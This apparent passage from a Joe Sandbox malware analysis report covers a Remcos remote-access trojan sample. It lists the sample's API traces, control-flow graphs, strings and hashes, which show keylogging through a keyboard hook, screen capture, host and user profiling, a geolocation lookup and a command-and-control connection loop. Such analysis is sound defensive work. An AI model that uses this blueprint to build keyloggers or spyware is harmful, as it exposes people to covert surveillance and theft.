                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBE9
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E9E1), ref: 0041CBFA
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CBFD
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E9E1), ref: 0041CC0E
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC11
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E9E1), ref: 0041CC22
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC25
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E9E1), ref: 0041CC36
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC39
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E9E1), ref: 0041CC4A
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC4D
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E9E1), ref: 0041CC5E
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC61
                                  • Part of subcall function 0041CB50: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040E9E1), ref: 0041CC72
                                  • Part of subcall function 0041CB50: GetProcAddress.KERNEL32(00000000), ref: 0041CC75
                                  • Part of subcall function 0041CB50: LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040E9E1), ref: 0041CC83
                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\xi0TpAxHGMsm.exe,00000104), ref: 0040E9EE
                                  • Part of subcall function 00410F37: __EH_prolog.LIBCMT ref: 00410F3C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                • String ID: 8SG$8SG$Access Level: $Administrator$C:\Users\user\Desktop\xi0TpAxHGMsm.exe$Exe$Exe$Inj$Pj$PSG$Remcos Agent initialized$Rmc-4QQORA$Software\$User$dMG$del$del$exepath$licence$license_code.txt$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG$PG
                                • API String ID: 2830904901-759398400
                                • Opcode ID: 14f86f78863529583602f9427b6238619959119db442783aa9dfda20479c072b
                                • Instruction ID: d4e128c763ae9979da4f7e35a5cae12564b96cb69b39ecb6445d524eb2b23fe8
                                • Opcode Fuzzy Hash: 14f86f78863529583602f9427b6238619959119db442783aa9dfda20479c072b
                                • Instruction Fuzzy Hash: 6332D860B043412BDA24B7729C67B6E26994F81748F50483FB9467B2E3EFBC4D45839E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00419627 Relevance: 17.7, APIs: 1, Strings: 9, Instructions: 206COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1308 419627-419654 call 4051e3 call 4041a2 1313 419695-419698 1308->1313 1314 419656-419690 call 4051e3 * 3 1308->1314 1315 4196f4-4196f7 1313->1315 1316 41969a-4196ef call 4051e3 * 4 call 419993 1313->1316 1350 419869-41986d call 41893c 1314->1350 1318 419754-419757 1315->1318 1319 4196f9-419752 call 4051e3 * 4 call 4194aa call 41988c 1315->1319 1380 4197b2-4197b3 1316->1380 1325 419759-4197ad call 4051e3 * 4 call 4194aa call 4198ef 1318->1325 1326 4197b8-4197bb 1318->1326 1319->1380 1325->1380 1331 419809-41980c 1326->1331 1332 4197bd-419807 call 4051e3 * 3 call 4194aa call 419952 1326->1332 1337 419813-419816 1331->1337 1338 41980e-419811 1331->1338 1353 419872-41988b call 401fd8 * 2 1332->1353 1345 419818-419819 1337->1345 1346 41982a-41982d 1337->1346 1344 41981b-419828 mouse_event 1338->1344 1344->1353 1345->1344 1346->1353 1354 41982f-419864 call 4051e3 * 3 1346->1354 1350->1353 1354->1350 1380->1353
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0$1$2$3$4$5$6$7$VG
                                • API String ID: 0-1861860590
                                • Opcode ID: 193c37930fd8eb919b95959c83fa6b3f7d6c848375a171d46b1cd691b6bd1505
                                • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                                • Opcode Fuzzy Hash: 193c37930fd8eb919b95959c83fa6b3f7d6c848375a171d46b1cd691b6bd1505
                                • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1554 40a2b8-40a2cf 1555 40a2d1-40a2eb GetModuleHandleA SetWindowsHookExA 1554->1555 1556 40a333-40a343 GetMessageA 1554->1556 1555->1556 1559 40a2ed-40a331 GetLastError call 41bb8e call 4052fd call 402093 call 41b4ef call 401fd8 1555->1559 1557 40a345-40a35d TranslateMessage DispatchMessageA 1556->1557 1558 40a35f 1556->1558 1557->1556 1557->1558 1560 40a361-40a366 1558->1560 1559->1560
                                APIs
                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                • GetLastError.KERNEL32 ref: 0040A2ED
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                • TranslateMessage.USER32(?), ref: 0040A34A
                                • DispatchMessageA.USER32(?), ref: 0040A355
                                Strings
                                • Keylogger initialization failure: error , xrefs: 0040A301
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                • String ID: Keylogger initialization failure: error
                                • API String ID: 3219506041-952744263
                                • Opcode ID: 351146aa31e7d8f010798953617ef069e45ce016b2dcdd27b6cd7b94982b1026
                                • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                • Opcode Fuzzy Hash: 351146aa31e7d8f010798953617ef069e45ce016b2dcdd27b6cd7b94982b1026
                                • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040F7A7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00413549: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413569
                                  • Part of subcall function 00413549: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004752F0), ref: 00413587
                                  • Part of subcall function 00413549: RegCloseKey.KERNEL32(?), ref: 00413592
                                • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                • ExitProcess.KERNEL32 ref: 0040F8CA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseExitOpenProcessQuerySleepValue
                                • String ID: 4.9.3 Pro$Pj$override$pth_unenc
                                • API String ID: 2281282204-3955947084
                                • Opcode ID: e8f8a8c6e09656479cbd18f8005b06e309874533347df5ec8e0d67fb659a5248
                                • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                • Opcode Fuzzy Hash: e8f8a8c6e09656479cbd18f8005b06e309874533347df5ec8e0d67fb659a5248
                                • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                Strings
                                • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleOpen$FileRead
                                • String ID: http://geoplugin.net/json.gp
                                • API String ID: 3121278467-91888290
                                • Opcode ID: 61b1c066cbf1f6e44ea73c093b6391bf97cae0235be39f00c5f2dbf4af9b1548
                                • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                • Opcode Fuzzy Hash: 61b1c066cbf1f6e44ea73c093b6391bf97cae0235be39f00c5f2dbf4af9b1548
                                • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B7FF Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: SystemTimes$Sleep__aulldiv
                                • String ID:
                                • API String ID: 188215759-0
                                • Opcode ID: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                • Instruction ID: 72b4c32e7059473e424b83a6cc96647c38f9827b21069785d395d2d8421d6a64
                                • Opcode Fuzzy Hash: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
                                • Instruction Fuzzy Hash: B0113D7A5083456BD304FAB5CC85DEB7BACEAC4654F040A3EF54A82051FE68EA4886A5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B60D Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                Download Yara Rule
                                APIs
                                • GetComputerNameExW.KERNEL32(00000001,?,0000002B,004750E4), ref: 0041B62A
                                • GetUserNameW.ADVAPI32(?,0040F223), ref: 0041B642
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Name$ComputerUser
                                • String ID:
                                • API String ID: 4229901323-0
                                • Opcode ID: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                • Instruction ID: 2f1a7eaa0fafc1393a04fa3680ad11d69711b7caddb5f837a5711c727b94ccef
                                • Opcode Fuzzy Hash: 9c10d94fd0e958066dbb06410c8ca978aa41ccff27f968e031cf55491574d835
                                • Instruction Fuzzy Hash: 3B014F7190011CABCB01EBD5DC45EEDB7BCAF44309F10016AB505B61A1EFB46E88CBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040F8D1 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                Download Yara Rule
                                APIs
                                • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004154FC,00474EE0,00475A00,00474EE0,00000000,00474EE0,00000000,00474EE0,4.9.3 Pro), ref: 0040F8E5
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID:
                                • API String ID: 2299586839-0
                                • Opcode ID: 2888965568e38a2ba7a5abe7093904758464576a93ba76aee1c710f175ee0f35
                                • Instruction ID: 54543d52817102a935349e0949155b160d3bd36039d058f0142c014f19b14c2e
                                • Opcode Fuzzy Hash: 2888965568e38a2ba7a5abe7093904758464576a93ba76aee1c710f175ee0f35
                                • Instruction Fuzzy Hash: D5D05B3074421C77D61096959D0AEAA779CD701B52F0001A6BB05D72C0D9E15E0087D1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00414F2A Relevance: 51.6, APIs: 5, Strings: 24, Instructions: 809sleepnetworkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 448 414f2a-414f72 call 4020df call 41b8b3 call 4020df call 401e65 call 401fab call 43baac 461 414f81-414fcd call 402093 call 401e65 call 4020f6 call 41be1b call 40489e call 401e65 call 40b9bd 448->461 462 414f74-414f7b Sleep 448->462 477 415041-4150dc call 402093 call 401e65 call 4020f6 call 41be1b call 401e65 * 2 call 406c1e call 402f10 call 401fe2 call 401fd8 * 2 call 401e65 call 405b05 461->477 478 414fcf-41503e call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 401e65 call 40247c call 401e65 call 401fab call 40473d 461->478 462->461 531 4150ec-4150f3 477->531 532 4150de-4150ea 477->532 478->477 533 4150f8-41518a call 405aa6 call 40531e call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 2 call 401e65 call 401fab call 401e65 call 401fab call 414ee9 531->533 532->533 560 4151d5-4151e3 call 40482d 533->560 561 41518c-4151d0 WSAGetLastError call 41cae1 call 4052fd call 402093 call 41b4ef call 401fd8 533->561 566 415210-415225 call 404f51 call 4048c8 560->566 567 4151e5-41520b call 402093 * 2 call 41b4ef 560->567 582 415aa3-415ab5 call 404e26 call 4021fa 561->582 566->582 583 41522b-41537e call 401e65 * 2 call 40531e call 406383 call 402f10 call 406383 call 402f10 call 402093 call 41b4ef call 401fd8 * 4 call 41b7e0 call 4145bd call 40905c call 441e81 call 401e65 call 4020f6 call 40247c call 401fab * 2 call 4136f8 566->583 567->582 597 415ab7-415ad7 call 401e65 call 401fab call 43baac Sleep 582->597 598 415add-415ae5 call 401e8d 582->598 648 415380-41538d call 405aa6 583->648 649 415392-4153b9 call 401fab call 4135a6 583->649 597->598 598->477 648->649 655 4153c0-415a0a call 40417e call 40dd89 call 41bc42 call 41bd1e call 41bb8e call 401e65 GetTickCount call 41bb8e call 41bae6 call 41bb8e * 2 call 41ba96 call 41bd1e * 5 call 40f8d1 call 41bd1e call 402f31 call 402ea1 call 402f10 call 402ea1 call 402f10 * 3 call 402ea1 call 402f10 call 406383 call 402f10 call 406383 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 402ea1 call 402f10 call 406383 call 402f10 * 5 call 402ea1 call 402f10 call 402ea1 call 402f10 * 7 call 402ea1 call 404aa1 call 401fd8 * 50 call 401f09 call 401fd8 * 6 call 401f09 call 404c10 649->655 656 4153bb-4153bd 649->656 901 415a0f-415a16 655->901 656->655 902 415a18-415a1f 901->902 903 415a2a-415a31 901->903 902->903 904 415a21-415a23 902->904 905 415a33-415a38 call 40b051 903->905 906 415a3d-415a6f call 405a6b call 402093 * 2 call 41b4ef 903->906 904->903 905->906 917 415a71-415a7d CreateThread 906->917 918 415a83-415a9e call 401fd8 * 2 call 401f09 906->918 917->918 918->582
                                APIs
                                • Sleep.KERNEL32(00000000,00000029,004752F0,004750E4,00000000), ref: 00414F7B
                                • WSAGetLastError.WS2_32(00000000,00000001), ref: 0041518C
                                • Sleep.KERNEL32(00000000,00000002), ref: 00415AD7
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep$ErrorLastLocalTime
                                • String ID: | $%I64u$4.9.3 Pro$8SG$C:\Users\user\Desktop\xi0TpAxHGMsm.exe$Connected | $Connecting | $Connection Error: $Connection Error: Unable to create socket$Disconnected$Exe$Pj$PSG$Rmc-4QQORA$TLS Off$TLS On $dMG$hlight$name$NG$NG$PG$PG$PG
                                • API String ID: 524882891-3908098953
                                • Opcode ID: ae63a67796a2acb5c78b155b8e05be1889c50b4469c3c0008c8dcc1c20085293
                                • Instruction ID: 324fc11d7bea0fba9c16e2c7d7b547a311b01f704130931fc4cc70caa797af2d
                                • Opcode Fuzzy Hash: ae63a67796a2acb5c78b155b8e05be1889c50b4469c3c0008c8dcc1c20085293
                                • Instruction Fuzzy Hash: 22526B31A001155ACB18F732DD96AFE73769F90344F6041BFE40A761E2EF781E858A5D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00418E76 Relevance: 51.1, APIs: 28, Strings: 1, Instructions: 328windowmemoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 925 418e76-418ebd CreateDCA CreateCompatibleDC call 419325 928 418ec3-418ede call 419367 925->928 929 418ebf-418ec1 925->929 930 418ee2-418ee4 928->930 929->928 929->930 933 418f36-418f3d call 402093 930->933 934 418ee6-418ee8 930->934 938 418f42-418f4e 933->938 934->933 935 418eea-418f21 call 41939d CreateCompatibleBitmap 934->935 940 418f23-418f2f DeleteDC * 2 935->940 941 418f4f-418f59 SelectObject 935->941 942 418f30 DeleteObject 940->942 943 418f5b 941->943 944 418f6a-418f91 StretchBlt 941->944 942->933 945 418f5c-418f68 DeleteDC * 2 943->945 944->943 946 418f93-418f98 944->946 945->942 947 419014-41901c 946->947 948 418f9a-418faf GetCursorInfo 946->948 950 41905e-419070 GetObjectA 947->950 951 41901e-419025 947->951 948->947 949 418fb1-418fc5 GetIconInfo 948->949 949->947 952 418fc7-419010 DeleteObject * 2 DrawIcon 949->952 950->943 955 419076-419088 950->955 953 419027-41904c BitBlt 951->953 954 41904e-41905b 951->954 952->947 953->950 954->950 956 41908a-41908c 955->956 957 41908e-419098 955->957 958 4190c5 956->958 959 4190c9-4190d2 957->959 960 41909a-4190a4 957->960 958->959 961 4190d3-41910d LocalAlloc 959->961 960->959 962 4190a6-4190b0 960->962 963 419119-419150 GlobalAlloc 961->963 964 41910f-419116 961->964 962->959 965 4190b2-4190b8 962->965 966 419152-419156 963->966 967 41915b-419170 GetDIBits 963->967 964->963 968 4190c2-4190c4 965->968 969 4190ba-4190c0 965->969 966->945 970 419172-419193 DeleteDC * 2 DeleteObject GlobalFree 967->970 971 419198-419260 call 4020df * 2 call 40250a call 403376 call 40250a call 403376 call 40250a call 403376 DeleteObject GlobalFree DeleteDC 967->971 968->958 969->961 970->933 988 419262-419263 DeleteDC 971->988 989 419265-419289 call 402055 call 401fd8 * 2 971->989 988->989 989->938
                                APIs
                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00418E90
                                • CreateCompatibleDC.GDI32(00000000), ref: 00418E9D
                                  • Part of subcall function 00419325: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00419355
                                • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00418F13
                                • DeleteDC.GDI32(00000000), ref: 00418F2A
                                • DeleteDC.GDI32(00000000), ref: 00418F2D
                                • DeleteObject.GDI32(00000000), ref: 00418F30
                                • SelectObject.GDI32(00000000,00000000), ref: 00418F51
                                • DeleteDC.GDI32(00000000), ref: 00418F62
                                • DeleteDC.GDI32(00000000), ref: 00418F65
                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 00418F89
                                • GetCursorInfo.USER32(?), ref: 00418FA7
                                • GetIconInfo.USER32(?,?), ref: 00418FBD
                                • DeleteObject.GDI32(?), ref: 00418FEC
                                • DeleteObject.GDI32(?), ref: 00418FF9
                                • DrawIcon.USER32(00000000,?,?,?), ref: 00419006
                                • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00660046), ref: 0041903C
                                • GetObjectA.GDI32(00000000,00000018,?), ref: 00419068
                                • LocalAlloc.KERNEL32(00000040,00000001), ref: 004190D5
                                • GlobalAlloc.KERNEL32(00000000,?), ref: 00419144
                                • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00419168
                                • DeleteDC.GDI32(?), ref: 0041917C
                                • DeleteDC.GDI32(00000000), ref: 0041917F
                                • DeleteObject.GDI32(00000000), ref: 00419182
                                • GlobalFree.KERNEL32(?), ref: 0041918D
                                • DeleteObject.GDI32(00000000), ref: 00419241
                                • GlobalFree.KERNELBASE(?), ref: 00419248
                                • DeleteDC.GDI32(?), ref: 00419258
                                • DeleteDC.GDI32(00000000), ref: 00419263
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Delete$Object$CreateGlobal$AllocCompatibleFreeIconInfo$BitmapBitsCursorDisplayDrawEnumLocalSelectSettingsStretch
                                • String ID: DISPLAY
                                • API String ID: 4256916514-865373369
                                • Opcode ID: 401f32e55b766b667a82985f611144001aa3f951cfdd06aec026960ff572dfcf
                                • Instruction ID: c224b28d618b709f2792c20de920cdabb9de4a917dc726d0ffe82d87ba3e906a
                                • Opcode Fuzzy Hash: 401f32e55b766b667a82985f611144001aa3f951cfdd06aec026960ff572dfcf
                                • Instruction Fuzzy Hash: 75C14C71508301AFD720DF25DC44BABBBE9EB88715F00482EF98993291DB74ED45CB6A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040D096 Relevance: 45.8, APIs: 6, Strings: 20, Instructions: 260registryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
